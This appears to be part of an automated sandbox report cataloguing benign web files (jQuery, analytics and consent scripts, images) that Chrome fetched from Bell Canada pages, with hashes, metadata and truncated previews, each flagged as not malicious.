                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................".."............................................................".....................................................0...................|......t........6.O..................J..zP......8.:.n.u...._P.....>.......*.....@.....O.O.nm...~C...............G.........1......u....R......>W.5.u...../..........W.*.A.......h:.oQO>.................e.~........~v.Yq...m......?...-..z..lz}......0...&.._;..y>Sn.}............ulmg.[.l...W......+c..........%.t.........8.....kO.63..|.>....8nRi`..s.8.>.....X..^...n...A.M6...".f).....?3..l..;p...c..2..y.(......^a.^f.....>q....9d..+.l..d.....{P...'.R.Ise...|.G..].8y..Q.mf......>I....m....O.Q..b..0.$.,}.p.......hu.-.._._G*......._]...~......k..O..l'..N.P...7.0W.t.....@.....%..V....9.9.].QGG...]6........O._.%....q.t.d.....yC..gO[.l....r..OO....S.:j..[........k..__.......K......Rk)G....W...5.#s...I.......a..f..U=.?d..i....5rX...
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (34755), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):112043
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.998577146099376
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:bMpbedfDvegHMtPQH1QVAEKmSQRQMh1JjSkB:gpCdfDvegstPQVQVAfmSQrnFSkB
                                                                                                                                                                                                                                                                                                                                      MD5:5B1401E36D0299353503EE77B95B45FA
                                                                                                                                                                                                                                                                                                                                      SHA1:5BF8FFA98608B6B711C84D87D2CBD8CCD158E05A
                                                                                                                                                                                                                                                                                                                                      SHA-256:B3E63C4EC315ED13E0B37DC2F610F5ECBC0BACFFD0B087218ACC759A8F280C19
                                                                                                                                                                                                                                                                                                                                      SHA-512:E82CBAC0C20AFAA48DEF857384FED93EDB8B6FA735548CE329699C2CECCBD382B3E6E4894A52330030FD20F2C715E8A4E1E91F499EADCDD632C03FF8FE921016
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/ids/js/jquery-1.10.2.min.js?ver=201809301812
                                                                                                                                                                                                                                                                                                                                      Preview:(function (e, t) {.. var n, r, i = typeof t, o = e.location, a = e.document, s = a.documentElement, l = e.jQuery, u = e.$, c = {}, p = [], f = "1.10.2", d = p.concat, h = p.push, g = p.slice, m = p.indexOf, y = c.toString, v = c.hasOwnProperty, b = f.trim, x = function (e, t) { return new x.fn.init(e, t, r) }, w = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source, T = /\S+/g, C = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g, N = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/, k = /^<(\w+)\s*\/?>(?:<\/\1>|)$/, E = /^[\],:{}\s]*$/, S = /(?:^|:|,)(?:\s*\[)+/g, A = /\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g, j = /"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g, D = /^-ms-/, L = /-([\da-z])/gi, H = function (e, t) { return t.toUpperCase() }, q = function (e) { (a.addEventListener || "load" === e.type || "complete" === a.readyState) && (_(), x.ready()) }, _ = function () { a.addEventListener ? (a.removeEventListener("DOMContentLoaded", q, !1), e.removeEventListener("load", q, !1)) : (a.detachEvent("
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4093
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.687583032984856
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:12oZc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOoa:12oZc5WNXK3XuXW5e
                                                                                                                                                                                                                                                                                                                                      MD5:CBBEBADB81364710EEDE4347330CDDB5
                                                                                                                                                                                                                                                                                                                                      SHA1:7295A459603600AB71E51D44A1121C3A4828D5C3
                                                                                                                                                                                                                                                                                                                                      SHA-256:9E391D1E062E437D6F55E60BA5BAE17010A3A0362517E4FD99BBEB214274A009
                                                                                                                                                                                                                                                                                                                                      SHA-512:0E12501FC0AB6FDB414F866EFC67911389296D7E27214943303F7D0F6515BD70401DB58F47949ADCEE646E3C6F5D59F85C8E6B72CCAF292A4002D0AFD2A69B6F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://bat.bing.com/p/action/19004038.js
                                                                                                                                                                                                                                                                                                                                      Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- < 1) retu
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):41172
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                                                                                                                                                      MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                                                      SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                                                      SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                                                      SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 750 x 651, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):153688
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.991432064162278
                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:Qn1kBOGe6pkPTKZzmzVEtvdJdX1GCR5z2CNhTT++0xC6suTzSF6lVzc:W1kBOGe/cZXrR53dT+PxCCTzSF6zc
                                                                                                                                                                                                                                                                                                                                      MD5:F2C6EFCCE7383065B6263B5397ACAA11
                                                                                                                                                                                                                                                                                                                                      SHA1:AD45AD3A78899C52AB732B9A57531AB915ED3053
                                                                                                                                                                                                                                                                                                                                      SHA-256:6E9952709E424B95DB685CBE9C0BB04CA7BD2139678348DB9D8D4F026FDE3C32
                                                                                                                                                                                                                                                                                                                                      SHA-512:BBF3C39A3AA37C28446EAC243E92DFB7469DF4AB0BE11C75BA9C25D5C7531A8E0317E3EB6B3234F4254D32B5856037E6BD0645E34B7D44E4D7768E30550428DE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............$.#....pHYs..!8..!8.E.1`..X.IDATx..w..D......K..M:HU..`GEE.bA..!.....; V..t..;,u..nO...[r...,......In2s..3..(.:::::::::::u..x............S9..........s..+.::::::::::'...........s.`<.....\.7^..$.(......+ ....X...d.M._~.H.|e..v......#.....H.E[_..1.y^..q.....3".-..k..++....-b]G..r#J...OW|..!)B...g....*......@.DD1....).....AAA.D.....e.E..A.l6a..+.EGGGGG.$D....\n......$.(..r..J...(.F......Ze.....}.&A.q.*pAu/..hj !..)....~=.2G...\K.s..ci.aYb}...KD..T.G....H3..60......D.'.%k2..@.P.%./+..^...........%.... ..o&.?..W.0."......B...&.f.V....T.EQp8].].$IF.e.A.|.._.*....9.(.mo.[.,!.e%.sd;%.....9#.5.Ya....=zm....hd....F1Z........&g.. ...B.ny..5L..(.(qnN. ..b.EDQ...h...WPu.Q...*....LF.V....q....ZDQ...Jq.<....E..r.v{.ze$........."I..,...4..\...;...6.t_f%.Q..}Ke.....@+.?].......+.j.........7.T!.%...C...8t..G=...uk_)..w...Q.....q....!..,B:......k...~..o..y.%G..1.....f.b6.(........AD.)..R..V..SPdU>....d.d2a2....&...(b..1..H.. @Jr"&
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1532)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1679
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.532033823359727
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:zlCt/BMl4wWeAzy2VBlsO00Mr9cJzCbpwxdkKNmxQ:cBBdReAm8JzLTqQ
                                                                                                                                                                                                                                                                                                                                      MD5:21AC0F261B601976AEF434CE3205A9FE
                                                                                                                                                                                                                                                                                                                                      SHA1:541C9B68B7DEB4AA273CA13132B26D546D451610
                                                                                                                                                                                                                                                                                                                                      SHA-256:4A8792F14CDC2ADC2BD0937CFF81E74D6125E2AD396C251C57BA4885596D4131
                                                                                                                                                                                                                                                                                                                                      SHA-512:568FCB3C780179F8B351A74993DDD148366CB2C0A7D485BE951381F7B8603D30747A89860C8C5FA3358539FD43513397844A026D0DC8506CE6BAD71257615990
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC70933dcf655e4484bbad15d268bdebf1-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC70933dcf655e4484bbad15d268bdebf1-source.min.js', "try{var pgn=(pgn=_satellite.getVar(\"d_page_name\")||\"\").toLowerCase(),prevPgn=_satellite.cookie.get(\"__bda_prev_previouspagename\")||\"\",mobRE=/^shop:(mobile:|Cart mobility:Summary|Checkout (mobility:|accessories:))/i,isMob=mobRE.test(pgn)||\"storelocator:landing page\"==pgn&&mobRE.test(prevPgn),ttID=\"CBR71BBC77UFHQ3IULUG\";isMob&&(ttID=\"CBR6VORC77U606K8AE30\"),function(e,t,o){e.TiktokAnalyticsObject=o;var n=e[o]=e[o]||[];n.methods=[\"page\",\"track\",\"identify\",\"instances\",\"debug\",\"on\",\"off\",\"once\",\"ready\",\"alias\",\"group\",\"enableCookie\",\"disableCookie\"],n.setAndDefer=function(e,t){e[t]=function(){e.push([t].concat(Array.prototype.slice.call(arguments,0)))}};for(var a
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (899)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1046
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.284674576764338
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlqf8aeLct/BMlqf8ae9JUYJM3kJtJaJnGPqJgivJ/oeIpKJB0rxx+sJGoD+L++S:zlq0ut/BMlq0b63kDUUyJxoeBB0dx+s5
                                                                                                                                                                                                                                                                                                                                      MD5:58D67A248E8AA9FA17E0565F3A17013F
                                                                                                                                                                                                                                                                                                                                      SHA1:9567085DF776763D37C02F504270D1DAFD11EFEB
                                                                                                                                                                                                                                                                                                                                      SHA-256:41134E4638511543908FB37189AA4EECABED1783D1E16B6CC89F2271F5733773
                                                                                                                                                                                                                                                                                                                                      SHA-512:7D553C13129884760B0D19D376E820B7DFC1520B47BB2A8F99C32C6A96400120D3BAA439D73A793C28F7ED9EBF598EA98BB7DB26FD06862F32286A9ABF6B0783
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0999b7fb83bc47cc8ef3706d46ca0c8d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0999b7fb83bc47cc8ef3706d46ca0c8d-source.min.js', "var consent=_satellite.getVar(\"d_consent\");if(1===consent?.analytics&&\"undefined\"!=typeof gtag){var ga4_prop=_satellite.getVar(\"d_ga4_property\"),isPV=_satellite.getVar(\"d_is_pageview\"),_dim_ga=_satellite.getVar(\"d_obj_dim_ga4\"),_evt_ga4=_satellite.getVar(\"d_event_dim_ga4\"),_cf=_satellite.getVar(\"s_cookie_flags\")||\"\";isPV&&(_dim_ga.cookie_flags=_cf,_dim_ga.allow_enhanced_conversions=!0,gtag(\"config\",ga4_prop,_dim_ga)),void 0!==_evt_ga4&&void 0!==_evt_ga4[0]&&_evt_ga4.forEach((function(e){if(\"purchase\"==e.event){var _=_satellite.getVar(\"f_getValue\")([\"s_oPID\"]),a=\"pid_ga4\";if(_satellite.cookie.get(a)==_)return;_satellite.cookie.set(a,_)}gtag(\"event\",e.event,Object.assign
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):74807
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.7763020038423205
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:FohckcEsIcoxcQKei4zByROlUohckcEsIcoxcQKei4zBwRcBH8R:2ByROxBwRcBcR
                                                                                                                                                                                                                                                                                                                                      MD5:43E9EB91934F407D6B85DB2C66E4766F
                                                                                                                                                                                                                                                                                                                                      SHA1:D18D4F12DC94BDA0B1C027515D6DE0E3CFD798A7
                                                                                                                                                                                                                                                                                                                                      SHA-256:E8FCA52DF9B46F069F7F6434A5442C982EE340F14111575BCF1BD89E2C58F2DA
                                                                                                                                                                                                                                                                                                                                      SHA-512:E5CAC234C65624C4CA8DC7E7423FB41474BC939E198443FFA6F55EA8D8021643543E21E5A165B122F14BAA9FF12ACE6516D0A77487557370D3EDDAE8B713C3A2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/Styles/media/support/support_billing.js?v=KR7PoLSGaiOSCgyy9C1Ud2821YrC64leCDHKia3RlvU1
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(73,28-29): run-time error JS1195: Expected expression: >..(78,36-37): run-time error JS1195: Expected expression: >..(78,118-119): run-time error JS1195: Expected expression: )..(79,38-39): run-time error JS1195: Expected expression: >..(81,14-15): run-time error JS1195: Expected expression: )..(84,9-10): run-time error JS1002: Syntax error: }..(87,10-13): run-time error JS1195: Expected expression: var..(87,42-43): run-time error JS1004: Expected ';': )..(108,5-6): run-time error JS1002: Syntax error: }..(110,41-42): run-time error JS1004: Expected ';': {..(122,1-2): run-time error JS1002: Syntax error: }..(127,28-29): run-time error JS1004: Expected ';': {..(418,56-57): run-time error JS1195: Expected expression: >..(932,28-29): run-time error JS1195: Expected expression: >..(937,36-37): run-time error JS1195: Expected expression: >..(937,118-119): run-time error JS1195: Expected expression: )..(938,38-39): run-time error JS119
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32026), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):342141
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947711427808844
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:khVLvH3MX1TNfb6t15cSgLeT3VOCfQpImNgqgRZBGjhKruRgvj:kvL/3MhNfet15cwT3VONgqg4Jgvj
                                                                                                                                                                                                                                                                                                                                      MD5:D5139C7D98945D6CD2EE756AB9E6236D
                                                                                                                                                                                                                                                                                                                                      SHA1:EF128990665894B8B07F14628D43E9C96F8A8531
                                                                                                                                                                                                                                                                                                                                      SHA-256:599D896DC10E534AB68D8831E1BA476524825F864EF9ACAF87FAB5982DA6C478
                                                                                                                                                                                                                                                                                                                                      SHA-512:763005443350E027E96F7C12930A09BDD00574BAD3C50668260475EF5A39BB349C74A5BB101748325AFC7E0A7267DDC2D82194B4ED64390EEFBAD519FFE869DF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(623,46-47): run-time error JS1195: Expected expression: >..(625,10-11): run-time error JS1195: Expected expression: )..(632,53-54): run-time error JS1195: Expected expression: )..(632,56-57): run-time error JS1195: Expected expression: >..(634,9-10): run-time error JS1002: Syntax error: }..(637,9-10): run-time error JS1002: Syntax error: }..(638,57-58): run-time error JS1004: Expected ';': {..(646,10-11): run-time error JS1195: Expected expression: )..(649,33-34): run-time error JS1004: Expected ';': {..(674,41-42): run-time error JS1195: Expected expression: >..(676,14-15): run-time error JS1195: Expected expression: )..(677,56-57): run-time error JS1195: Expected expression: )..(677,59-60): run-time error JS1195: Expected expression: >..(679,14-15): run-time error JS1195: Expected expression: )..(680,34-35): run-time error JS1197: Too many errors. The file might not be a JavaScript file: ...(669,5-38): run-time error JS1301: En
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.904157601986404
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREIuyqXXl6EAFVQ1CSHI:UrXizqX1yVMRo
                                                                                                                                                                                                                                                                                                                                      MD5:9DFBB6CAC092BCB8F48829FC4288B018
                                                                                                                                                                                                                                                                                                                                      SHA1:8204272FAB7E63D8FB57A8F269113CAFFBBDB29E
                                                                                                                                                                                                                                                                                                                                      SHA-256:5EC52ECA2172F55B7784AD81618465F238F83AA68A84C6209F7181E45C55B165
                                                                                                                                                                                                                                                                                                                                      SHA-512:F752C969BD6077556F23C28AD832B42DBDC02CD21DC63D78B5D46CCBE37A15AD3D6B12F86356CB7DBA6B74A9C5B71E5FB2B74D365DF204FDEA19BE1C59E4DA5B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__10
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__10 === 'function' && branch_callback__10("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):148
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.383737272650757
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:HrPyuhW49zZzFmWOk5Ev2jkvf5+HeurgkgbKKzKpRkYrmSWNQNswkMSk:zyy/FhO7vNvmeudY0yXQNsu
                                                                                                                                                                                                                                                                                                                                      MD5:1E3590BE7679541E93FC260E1ED08C69
                                                                                                                                                                                                                                                                                                                                      SHA1:8E52D3309FD138B58770DC32AFC8DAEBD170EE61
                                                                                                                                                                                                                                                                                                                                      SHA-256:AD05BDC5C67CD50A7A3E81320DA171CAD9260C4776872FB31EED34E6792F4E4C
                                                                                                                                                                                                                                                                                                                                      SHA-512:363B0D45B87EBC740406C1DE0C25A14BD92217095C46CEBDC221D8C7F7C2AA7772E4AAE0BABD9BB95DBCCB961B110284B5AE30E5AD98EB3786A8A7AED75F6C80
                                                                                                                                                                                                                                                                                                                                      Malicious:false
